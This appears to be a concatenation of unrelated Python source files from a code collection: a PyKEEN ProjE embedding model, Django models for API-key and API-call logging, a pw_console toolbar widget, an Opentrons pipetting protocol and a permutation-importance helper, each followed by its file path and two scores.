r = self.relation_embeddings(indices=rt_batch[:, 0])
t = self.entity_embeddings(indices=rt_batch[:, 1])
# Rank against all entities
hidden = self.inner_non_linearity(
self.d_e[None, None, :] * h[None, :, :]
+ (self.d_r[None, None, :] * r[:, None, :] + self.b_c[None, None, :]),
)
scores = torch.sum(hidden * t[:, None, :], dim=-1) + self.b_p
return scores
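# --- Illustrative sketch (my addition): the ProjE combination operator on toy tensors ---
# Because D_e and D_r are diagonal, they reduce to elementwise scalings, which is exactly
# why the scoring methods above can use plain `d_e * h + d_r * r + b_c`. Values are
# arbitrary; torch is already imported at the top of this module.
if __name__ == '__main__':
    k = 4
    h = torch.randn(k)        # head entity embedding
    r = torch.randn(k)        # relation embedding
    d_e = torch.randn(k)      # diagonal of D_e
    d_r = torch.randn(k)      # diagonal of D_r
    b_c = torch.randn(k)      # combination bias
    combined = torch.tanh(d_e * h + d_r * r + b_c)   # h (x) r followed by z = tanh (default inner non-linearity)
    print(combined.shape)     # torch.Size([4])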
|
src/pykeen/models/unimodal/proj_e.py
|
from typing import Optional
import numpy
import torch
import torch.autograd
from torch import nn
from ..base import EntityRelationEmbeddingModel
from ...losses import Loss
from ...nn.init import xavier_uniform_
from ...regularizers import Regularizer
from ...triples import TriplesFactory
from ...typing import DeviceHint
__all__ = [
'ProjE',
]
class ProjE(EntityRelationEmbeddingModel):
r"""An implementation of ProjE from [shi2017]_.
ProjE is a neural network-based approach with a *combination* and a *projection* layer. The interaction model
first combines $h$ and $r$ by following combination operator:
.. math::
\textbf{h} \otimes \textbf{r} = \textbf{D}_e \textbf{h} + \textbf{D}_r \textbf{r} + \textbf{b}_c
where $\textbf{D}_e, \textbf{D}_r \in \mathbb{R}^{k \times k}$ are diagonal matrices which are used as shared
parameters among all entities and relations, and $\textbf{b}_c \in \mathbb{R}^{k}$ represents the candidate bias
vector shared across all entities. Next, the score for the triple $(h,r,t) \in \mathbb{K}$ is computed:
.. math::
f(h, r, t) = g(\textbf{t} \ z(\textbf{h} \otimes \textbf{r}) + \textbf{b}_p)
where $g$ and $z$ are activation functions, and $\textbf{b}_p$ represents the shared projection bias vector.
.. seealso::
- Official Implementation: https://github.com/nddsg/ProjE
"""
#: The default strategy for optimizing the model's hyper-parameters
hpo_default = dict(
embedding_dim=dict(type=int, low=50, high=350, q=25),
)
#: The default loss function class
loss_default = nn.BCEWithLogitsLoss
#: The default parameters for the default loss function class
loss_default_kwargs = dict(reduction='mean')
def __init__(
self,
triples_factory: TriplesFactory,
embedding_dim: int = 50,
automatic_memory_optimization: Optional[bool] = None,
loss: Optional[Loss] = None,
preferred_device: DeviceHint = None,
random_seed: Optional[int] = None,
inner_non_linearity: Optional[nn.Module] = None,
regularizer: Optional[Regularizer] = None,
) -> None:
super().__init__(
triples_factory=triples_factory,
embedding_dim=embedding_dim,
automatic_memory_optimization=automatic_memory_optimization,
loss=loss,
preferred_device=preferred_device,
random_seed=random_seed,
regularizer=regularizer,
entity_initializer=xavier_uniform_,
relation_initializer=xavier_uniform_,
)
# Global entity projection
self.d_e = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global relation projection
self.d_r = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global combination bias
self.b_c = nn.Parameter(torch.empty(self.embedding_dim, device=self.device), requires_grad=True)
# Global combination bias
self.b_p = nn.Parameter(torch.empty(1, device=self.device), requires_grad=True)
if inner_non_linearity is None:
inner_non_linearity = nn.Tanh()
self.inner_non_linearity = inner_non_linearity
def _reset_parameters_(self): # noqa: D102
super()._reset_parameters_()
bound = numpy.sqrt(6) / self.embedding_dim
nn.init.uniform_(self.d_e, a=-bound, b=bound)
nn.init.uniform_(self.d_r, a=-bound, b=bound)
nn.init.uniform_(self.b_c, a=-bound, b=bound)
nn.init.uniform_(self.b_p, a=-bound, b=bound)
def score_hrt(self, hrt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=hrt_batch[:, 0])
r = self.relation_embeddings(indices=hrt_batch[:, 1])
t = self.entity_embeddings(indices=hrt_batch[:, 2])
# Compute score
hidden = self.inner_non_linearity(self.d_e[None, :] * h + self.d_r[None, :] * r + self.b_c[None, :])
scores = torch.sum(hidden * t, dim=-1, keepdim=True) + self.b_p
return scores
def score_t(self, hr_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=hr_batch[:, 0])
r = self.relation_embeddings(indices=hr_batch[:, 1])
t = self.entity_embeddings(indices=None)
# Rank against all entities
hidden = self.inner_non_linearity(self.d_e[None, :] * h + self.d_r[None, :] * r + self.b_c[None, :])
scores = torch.sum(hidden[:, None, :] * t[None, :, :], dim=-1) + self.b_p
return scores
def score_h(self, rt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102
# Get embeddings
h = self.entity_embeddings(indices=None)
r = self.relation_embeddings(indices=rt_batch[:, 0])
t = self.entity_embeddings(indices=rt_batch[:, 1])
# Rank against all entities
hidden = self.inner_non_linearity(
self.d_e[None, None, :] * h[None, :, :]
+ (self.d_r[None, None, :] * r[:, None, :] + self.b_c[None, None, :]),
)
scores = torch.sum(hidden * t[:, None, :], dim=-1) + self.b_p
return scores
| 0.971913 | 0.840652 |
import logging
from django.conf import settings
from django.db import models
# Instantiate logger.
logger = logging.getLogger(__name__)
class ApiKey(models.Model):
"""
Keys used for authenticating API requests.
"""
user = models.ForeignKey(settings.AUTH_USER_MODEL)
key = models.CharField(max_length=200, unique=True, db_index=True)
description = models.CharField(max_length=200, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
last_used = models.DateTimeField(blank=True, null=True)
active = models.BooleanField()
def __unicode__(self):
"""
String representation of the instance.
"""
return str(self.user)
class ApiCall(models.Model):
"""
Log details regarding API call.
"""
date = models.DateTimeField()
method = models.CharField(max_length=10)
endpoint = models.CharField(max_length=100)
source_ip = models.CharField(max_length=50)
execution_start = models.DateTimeField()
execution_end = models.DateTimeField()
status = models.IntegerField()
user_agent = models.CharField(max_length=200)
authentication_class = models.CharField(max_length=50, blank=True)
authentication_user = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True)
authentication_token = models.CharField(max_length=200, blank=True)
request_get_params = models.TextField(blank=True)
request_data = models.TextField(blank=True)
response_data = models.TextField(blank=True)
def __unicode__(self):
"""
String representation of the instance.
"""
return self.method
def execution_time(self):
"""
Returns the execution time (in seconds) for the given API call.
"""
        # Use total_seconds() so calls longer than one second are measured correctly.
        return round((self.execution_end - self.execution_start).total_seconds(), 3)
@staticmethod
def new(date, method, endpoint, source_ip, execution_start, execution_end, status, user_agent,
authentication=None, request_get_params=None, request_data=None, response_data=None):
"""
Logs an API call.
"""
api_call = ApiCall(date=date,
method=method,
endpoint=endpoint,
source_ip=source_ip,
execution_start=execution_start,
execution_end=execution_end,
status=status,
user_agent=user_agent)
# If call was authenticated.
if authentication:
# Fetch details.
authentication_user = authentication['user']
authentication_class = authentication['class']
authentication_token = authentication['token']
# User.
api_call.authentication_user = authentication_user
            # These details may be missing, but the columns are not nullable,
            # so fall back to an empty string when they are absent.
            api_call.authentication_class = authentication_class or ''
            api_call.authentication_token = authentication_token or ''
# If request/response data provided.
if request_get_params:
api_call.request_get_params = request_get_params
if request_data:
api_call.request_data = request_data
if response_data:
api_call.response_data = response_data
# Save and return.
api_call.save()
return api_call
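# A minimal usage sketch, assuming Django settings are configured and that
# timezone-aware datetimes are used; the endpoint, IP and user agent below are
# illustrative values only.
def _example_log_call():
    from django.utils import timezone
    started = timezone.now()
    # ... handle the request here ...
    finished = timezone.now()
    call = ApiCall.new(date=started,
                       method='GET',
                       endpoint='/api/v1/example/',
                       source_ip='127.0.0.1',
                       execution_start=started,
                       execution_end=finished,
                       status=200,
                       user_agent='example-client/1.0')
    return call.execution_time()  # seconds, rounded to 3 decimal places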
|
yapi/models.py
| 0.679285 | 0.097907 |
"""Window pane toolbar base class."""
from typing import Any, Callable, List, Optional
import functools
from prompt_toolkit.filters import Condition, has_focus
from prompt_toolkit.layout import (
ConditionalContainer,
FormattedTextControl,
VSplit,
Window,
WindowAlign,
)
import pw_console.style
from pw_console.widgets import (
ToolbarButton,
to_checkbox_with_keybind_indicator,
to_keybind_indicator,
)
import pw_console.widgets.mouse_handlers
class WindowPaneToolbar:
"""One line toolbar for display at the bottom of of a window pane."""
# pylint: disable=too-many-instance-attributes
TOOLBAR_HEIGHT = 1
def get_left_text_tokens(self):
"""Return toolbar indicator and title."""
title = ' {} '.format(self.title)
return pw_console.style.get_pane_indicator(self.focus_check_container,
title,
self.focus_mouse_handler)
def get_center_text_tokens(self):
"""Return formatted text tokens for display in the center part of the
toolbar."""
button_style = pw_console.style.get_button_style(
self.focus_check_container)
# FormattedTextTuple contents: (Style, Text, Mouse handler)
        separator_text = [('', '  ')]  # 2 spaces of separation between keybinds.
        if self.focus_mouse_handler:
            separator_text = [('', '  ', self.focus_mouse_handler)]
fragments = []
fragments.extend(separator_text)
for button in self.buttons:
on_click_handler = None
if button.mouse_handler:
on_click_handler = functools.partial(
pw_console.widgets.mouse_handlers.on_click,
button.mouse_handler)
if button.is_checkbox:
fragments.extend(
to_checkbox_with_keybind_indicator(
button.checked(),
button.key,
button.description,
on_click_handler,
base_style=button_style))
else:
fragments.extend(
to_keybind_indicator(button.key,
button.description,
on_click_handler,
base_style=button_style))
fragments.extend(separator_text)
# Remaining whitespace should focus on click.
fragments.extend(separator_text)
return fragments
def get_right_text_tokens(self):
"""Return formatted text tokens for display."""
fragments = []
if not has_focus(self.focus_check_container.__pt_container__())():
fragments.append((
'class:toolbar-button-inactive class:toolbar-button-decoration',
' ', self.focus_mouse_handler))
fragments.append(('class:toolbar-button-inactive class:keyhelp',
'click to focus', self.focus_mouse_handler))
fragments.append((
'class:toolbar-button-inactive class:toolbar-button-decoration',
' ', self.focus_mouse_handler))
fragments.append(
('', ' {} '.format(self.subtitle()), self.focus_mouse_handler))
return fragments
def add_button(self, button: ToolbarButton):
self.buttons.append(button)
def __init__(
self,
parent_window_pane: Optional[Any] = None,
title: Optional[str] = None,
subtitle: Optional[Callable[[], str]] = None,
focus_check_container: Optional[Any] = None,
focus_action_callable: Optional[Callable] = None,
center_section_align: WindowAlign = WindowAlign.LEFT,
):
self.parent_window_pane = parent_window_pane
self.title = title
self.subtitle = subtitle
        # By default, check this container itself for focus.
self.focus_check_container = self
self.focus_action_callable = None
# Set parent_window_pane related options
if self.parent_window_pane:
self.title = self.parent_window_pane.pane_title()
self.subtitle = self.parent_window_pane.pane_subtitle
self.focus_check_container = self.parent_window_pane
self.focus_action_callable = self.parent_window_pane.focus_self
# Set title overrides
if self.subtitle is None:
def empty_subtitle() -> str:
return ''
self.subtitle = empty_subtitle
if focus_check_container:
self.focus_check_container = focus_check_container
if focus_action_callable:
self.focus_action_callable = focus_action_callable
self.focus_mouse_handler = None
if self.focus_action_callable:
self.focus_mouse_handler = functools.partial(
pw_console.widgets.mouse_handlers.on_click,
self.focus_action_callable)
self.buttons: List[ToolbarButton] = []
self.show_toolbar = True
self.left_section_window = Window(
content=FormattedTextControl(self.get_left_text_tokens),
align=WindowAlign.LEFT,
dont_extend_width=True,
)
self.center_section_window = Window(
content=FormattedTextControl(self.get_center_text_tokens),
align=center_section_align,
dont_extend_width=False,
)
self.right_section_window = Window(
content=FormattedTextControl(self.get_right_text_tokens),
# Right side text should appear at the far right of the toolbar
align=WindowAlign.RIGHT,
dont_extend_width=True,
)
get_toolbar_style = functools.partial(
pw_console.style.get_toolbar_style, self.focus_check_container)
self.toolbar_vsplit = VSplit(
[
self.left_section_window,
self.center_section_window,
self.right_section_window,
],
height=WindowPaneToolbar.TOOLBAR_HEIGHT,
style=get_toolbar_style,
)
self.container = self._create_toolbar_container(self.toolbar_vsplit)
def _create_toolbar_container(self, content):
return ConditionalContainer(
content, filter=Condition(lambda: self.show_toolbar))
def __pt_container__(self):
"""Return the prompt_toolkit root container for this log pane.
This allows self to be used wherever prompt_toolkit expects a container
object."""
return self.container # pylint: disable=no-member
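# A minimal usage sketch: a standalone toolbar with one keybind button. This
# assumes ToolbarButton accepts the key / description / mouse_handler /
# is_checkbox fields read in get_center_text_tokens; the title, key name and
# handler below are illustrative only.
def _example_toolbar() -> WindowPaneToolbar:
    toolbar = WindowPaneToolbar(title='Example Pane',
                                subtitle=lambda: 'ready')
    toolbar.add_button(
        ToolbarButton(key='Ctrl-w',
                      description='Wrap lines',
                      mouse_handler=None,
                      is_checkbox=False))
    return toolbar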
|
pw_console/py/pw_console/widgets/window_pane_toolbar.py
| 0.867162 | 0.068382 |
from opentrons import protocol_api
import pandas as pd
import math
# Not yet implemented: labware compatibility and constraints
metadata = {'apiLevel': '2.8'}
def run(protocol: protocol_api.ProtocolContext):
pipette_name = 'p300_single'
#file path
df = pd.read_csv(r'test/generated_test_files/random_plate.tsv', sep='\t')
#volume each well
maxVol = 200
tuberack_1 = protocol.load_labware('opentrons_6_tuberack_falcon_50ml_conical',1)
tuberack_2 = protocol.load_labware('opentrons_6_tuberack_falcon_50ml_conical',2)
tiprack_1 = protocol.load_labware('opentrons_96_tiprack_300ul',3)
plate = protocol.load_labware('corning_96_wellplate_360ul_flat',4)
pipette = protocol.load_instrument(pipette_name,'right', tip_racks=[tiprack_1])
    # Calculate the per-well total concentration (each well should sum to 1)
sources = list(df)
sources.remove("wells")
tubes = len(df.columns) - 1
df['sumVol'] = df[sources].sum(axis=1)
#create the output file
df1 = pd.DataFrame(columns = [])
df1.index.name = 'wells'
#initialize the sources column
for i in range (12):
df1['source ' + str(i+1)] = 0
#initialize the values of each cell
for i in range (96):
df1.loc[i] = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
#make index start at 1
    df1.index = df1.index + 1
    df1 = df1.sort_index()
#determine the amount to aspirate to multi-dispense
if pipette_name == 'p20_single':
aspireVol = 20
minVol = 2
elif pipette_name == 'p300_single':
aspireVol = 300
minVol = 30
else:
aspireVol = 1000
minVol = 100
curVol = 0 #current volume in tip
#check invalid concentration (total not = 1)
#create an ignore array that includes wells with no solution
#determine validWells to constrain the range of inner for loop
ignore=[]
validWells = 0
    for i in df.index:
        total = df['sumVol'][i]  # avoid shadowing the builtin sum()
        if round(total, 3) != 1 and total != 0:
            print("Invalid vol at well", i + 1)
            ignore.append(i)
        elif round(total, 3) == 1:
            validWells = i + 1
        else:  # total == 0
            ignore.append(i)
#set tubeRack
    #start transferring
curRack = tuberack_1
curTube = -1
#nested loops to transfer from 1 tube to many wells
#outer loop: accessing tube
for i in range(tubes):
#switch from tuberack_1 to tuberack_2 as needed
if i+1 == math.ceil(tubes/2+1):
curRack = tuberack_2
curTube = -1
curTube += 1
pipette.pick_up_tip()
#inner loop: accessing the wells
for j in range(validWells):
volTip = (df.iat[j,i+1])*maxVol
            # aspirate a full tip when the remaining volume is insufficient
if curVol < volTip or curVol <= minVol:
pipette.aspirate(float(aspireVol-curVol), curRack.wells()[curTube])
curVol = aspireVol
if j not in ignore:
if volTip != 0:
pipette.dispense(float(volTip), plate.wells()[j])
curVol -= volTip
if i+1 < 7:
df1.at[j+1,'source '+str(curTube+1)] = float(volTip)
else:
df1.at[j+1,'source '+str(curTube+7)] = float(volTip)
if j == validWells - 1:
#pipette.blow_out(curRack.wells()[curTube])
curVol = 0
pipette.drop_tip()
df1.to_csv("output.tsv", sep="\t")
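# Minimal sketch of the expected input layout (column names are illustrative):
# the TSV is assumed to have a 'wells' column plus one column per source tube,
# where each cell is that source's fraction of maxVol and each row sums to 1.
def _example_input_frame():
    return pd.DataFrame({
        'wells': [1, 2, 3],
        'source 1': [0.25, 0.0, 0.5],
        'source 2': [0.75, 1.0, 0.5],
    })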
|
distribute.py
| 0.242564 | 0.275443 |
import numpy as np
from sklearn.metrics import accuracy_score, f1_score
from eli5.permutation_importance import get_score_importances
class PermutationImportance_(object):
"""
see https://eli5.readthedocs.io/en/latest/blackbox/permutation_importance.html
and see https://www.kaggle.com/dansbecker/permutation-importance
for details
Parameters:
-----------
model: model object that have predict method
feature: ndarray with shape of [n_samples, n_features]
Machine learning features
target: ndarray with shape of [n_samples,]
        Machine learning target (labels)
Attributes:
--------
weight_: ndarray with shape of [n_features, ]
Feature importance (weight)
"""
def __init__(self, model, feature, target, metric="accuracy"):
self.model = model
self.feature = feature
self.target = target
self.metric = metric
self.metric_dict = {"accuracy": self.score_acc, "f1": self.score_f1} # you should update it
def fit(self):
base_score, score_decreases = get_score_importances(
self.metric_dict[self.metric],
self.feature,
self.target
)
self.weight_ = np.mean(score_decreases, axis=0)
return self
    def score_acc(self, feature, target):
        """Get accuracy of the model on (feature, target)."""
        y_pred = self.model.predict(feature)
        return self.get_acc(target, y_pred)
    def score_f1(self, feature, target):
        """Get F1 score of the model on (feature, target)."""
        y_pred = self.model.predict(feature)
        return self.get_f1(target, y_pred)
    @staticmethod
    def get_acc(target, y_pred):
        # Simple default; swap in eslearn.model_evaluator if preferred.
        return accuracy_score(target, y_pred)
    @staticmethod
    def get_f1(target, y_pred):
        # Simple default; swap in eslearn.model_evaluator if preferred.
        return f1_score(target, y_pred)
if __name__ == "__main__":
from sklearn.svm import LinearSVC
from sklearn.datasets import make_classification
X, y = make_classification(n_features=4, random_state=0)
model = LinearSVC(random_state=0, tol=1e-5)
model.fit(X, y)
permimp = PermutationImportance_(model, X, y)
permimp.fit()
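    # Illustrative cross-check of what fit() estimates: permute one feature
    # column at a time, re-score, and compare the drop against the baseline.
    # A single shuffle per feature is used here, so the values are noisy.
    rng = np.random.default_rng(0)
    baseline = model.score(X, y)
    drops = []
    for j in range(X.shape[1]):
        X_perm = X.copy()
        X_perm[:, j] = X_perm[rng.permutation(X.shape[0]), j]
        drops.append(baseline - model.score(X_perm, y))
    print("eli5-based weights:", np.round(permimp.weight_, 3))
    print("manual single-shuffle drops:", np.round(drops, 3))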
|
eslearn/utils/permutation_importance.py
| 0.839306 | 0.517815 |